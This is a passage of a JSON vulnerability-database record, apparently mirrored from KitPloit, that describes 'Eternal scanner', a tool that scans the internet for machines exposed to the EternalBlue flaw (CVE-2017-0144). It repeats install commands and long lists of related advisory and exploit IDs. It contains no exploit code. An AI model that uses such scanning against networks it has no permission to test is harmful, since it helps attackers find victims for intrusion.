"2020-12-08T15:25:54", "modified": "2017-07-22T20:30:34", "objectVersion": "1.5", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 169}, "different_elements": ["cvss3", "cvss2"], "edition": 24, "lastseen": "2020-12-08T15:25:54"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2018-13379", "CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "[ 
![](https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png) ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[ ![](https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s640/eternal_scanner_02.png) ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[ ![](https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s640/eternal_scanner_03.png) ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[ ![](https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s640/eternal_scanner_04.png) ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s640/eternal_scanner_05.png) ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) 
**\n", "edition": 21, "enchantments": {"dependencies": {"modified": "2020-12-01T09:23:29", "references": [{"idList": ["PACKETSTORM:154146", "PACKETSTORM:154147", "PACKETSTORM:142602", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-33134", "1337DAY-ID-33133", "1337DAY-ID-27802", "1337DAY-ID-27803"], "type": "zdt"}, {"idList": ["FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL"], "type": "nessus"}, {"idList": ["KITPLOIT:4113749299129429805", "KITPLOIT:3198936338651332513", "KITPLOIT:7649136962324988728", "KITPLOIT:2019269538971304233", "KITPLOIT:8246989959054757447", "KITPLOIT:490853400476183024", "KITPLOIT:8604395727754154957", "KITPLOIT:3233519682504638202", "KITPLOIT:7438852402079750053", "KITPLOIT:242625370833716747"], "type": "kitploit"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["AKB:35B88369-C440-49C0-98FF-C50E258FB32C"], "type": "attackerkb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["EDB-ID:42030", "EDB-ID:47288", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["CVE-2018-13379", "CVE-2017-0144"], "type": "cve"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"], "type": "exploitpack"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["E-691"], "type": "dsquare"}, {"idList": 
["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}], "rev": 2}, "score": {"modified": "2020-12-01T09:23:29", "rev": 2, "value": 5.8, "vector": "NONE"}}, "hash": "8237569ad9e335fc0c765c76909ef7decf5bf72976f5561fb0ca83040c45c971", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}, {"hash": "55b5f8074a1bbb9f8b397a1860b20f9b", "key": "cvelist"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "lastseen": "2020-12-01T09:23:29", "modified": "2017-07-22T20:30:34", "objectVersion": "1.3", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 168}, "differentElements": ["cvelist"], "edition": 21, "lastseen": "2020-12-01T09:23:29"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": 
["CVE-2017-0144", "CVE-2019-0708"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "[ ![](https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png) ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[ ![](https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s640/eternal_scanner_02.png) ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[ ![](https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s640/eternal_scanner_03.png) ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[ ![](https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s640/eternal_scanner_04.png) ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s640/eternal_scanner_05.png) 
](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "edition": 15, "enchantments": {"dependencies": {"modified": "2019-10-18T14:34:20", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP"], "type": "metasploit"}, {"idList": ["EDB-ID:42030", "EDB-ID:42031", "EDB-ID:47120"], "type": "exploitdb"}, {"idList": ["QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5"], "type": "qualysblog"}, {"idList": ["SMNTC-108273", "SMNTC-96704"], "type": "symantec"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["CVE-2017-0144", "CVE-2019-0708"], "type": "cve"}, {"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["KITPLOIT:3746269283079108633", "KITPLOIT:8690827452472466093", "KITPLOIT:998955151150716619", "KITPLOIT:2846211113425563801", "KITPLOIT:2143278485443977074", "KITPLOIT:5772130773824454432", "KITPLOIT:8886349906352353597", "KITPLOIT:7460768340536359638", "KITPLOIT:4693152054138988283", "KITPLOIT:4482238198881011483"], "type": "kitploit"}, {"idList": ["MSRC:6A6ED6A5B652378DCBA3113B064E973B"], "type": "msrc"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["PACKETSTORM:142602", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"], "type": "talosblog"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", 
"SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27803"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310108611"], "type": "openvas"}, {"idList": ["MYHACK58:62201994152", "MYHACK58:62201995881", "MYHACK58:62201994259", "MYHACK58:62201994154", "MYHACK58:62201994234", "MYHACK58:62201994153", "MYHACK58:62201994162"], "type": "myhack58"}, {"idList": ["F5:K25238311"], "type": "f5"}]}, "score": {"modified": "2019-10-18T14:34:20", "value": 5.4, "vector": "NONE"}}, "hash": "10bd4cbc0e1e0fc1b36273b35152ff55545764cd51151d4a3f8f2c8a054081f4", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}, {"hash": "05a99c986a0efc7815d8eb88b690b20d", "key": "cvelist"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "lastseen": "2019-10-18T14:34:20", "modified": "2017-07-22T20:30:34", "objectVersion": "1.3", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": 
"Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 160}, "differentElements": ["cvss", "cvelist"], "edition": 15, "lastseen": "2019-10-18T14:34:20"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "[ ![](https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png) ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[ ![](https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s640/eternal_scanner_02.png) ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[ ![](https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s640/eternal_scanner_03.png) ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[ ![](https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s640/eternal_scanner_04.png) 
](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s640/eternal_scanner_05.png) ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "edition": 18, "enchantments": {"dependencies": {"modified": "2020-02-25T04:36:32", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": 
"avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["CVE-2017-0144"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-02-25T04:36:32", "value": 7.7, "vector": "NONE"}}, "hash": "7bcf450eec2ef9fe0e5bb283ac6c29629b3e935b82879d222e88fdc7616601d6", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, 
{"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "lastseen": "2020-02-25T04:36:32", "modified": "2017-07-22T20:30:34", "objectVersion": "1.3", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 164}, "differentElements": ["cvelist"], "edition": 18, "lastseen": "2020-02-25T04:36:32"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2017-0144", "CVE-2018-10933"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "[ ![](https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png) ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. 
\n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[ ![](https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s640/eternal_scanner_02.png) ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[ ![](https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s640/eternal_scanner_03.png) ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[ ![](https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s640/eternal_scanner_04.png) ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s640/eternal_scanner_05.png) ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "edition": 4, "enchantments": {"score": {"modified": "2018-10-23T03:26:00", "value": 5.0, "vector": "NONE"}}, "hash": "3d555cfff42a434c63abb880c5e49cd606fb1b96015e642970cf3989b61834e5", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": 
"97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "793f1ce18d29ca6a9cd7829b2165b0a9", "key": "cvelist"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "lastseen": "2018-10-23T03:26:00", "modified": "2017-07-22T20:30:34", "objectVersion": "1.3", "published": "2017-07-22T20:30:34", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], "reporter": "KitPloit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "toolHref": "https://github.com/peterpt/eternal_scanner", "type": "kitploit", "viewCount": 138}, "differentElements": ["cvelist"], "edition": 4, "lastseen": "2018-10-23T03:26:00"}], "edition": 25, "hashmap": [{"key": "bulletinFamily", "hash": "4a931512ce65bdc9ca6808adf92d8783"}, {"key": "cvelist", "hash": "013b6203cead14382a8f19ad32d99966"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "9df98113b3627a03ccb38f7f88ba42eb"}, {"key": "href", "hash": "1b52e5b85d1d34348a9126f4ca83d047"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "c57d2ee468d93289dff158782f8ce588"}, {"key": "published", "hash": "c57d2ee468d93289dff158782f8ce588"}, {"key": 
